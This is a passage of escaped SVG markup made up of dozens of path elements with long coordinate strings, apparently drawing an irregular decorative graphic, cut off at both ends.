d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7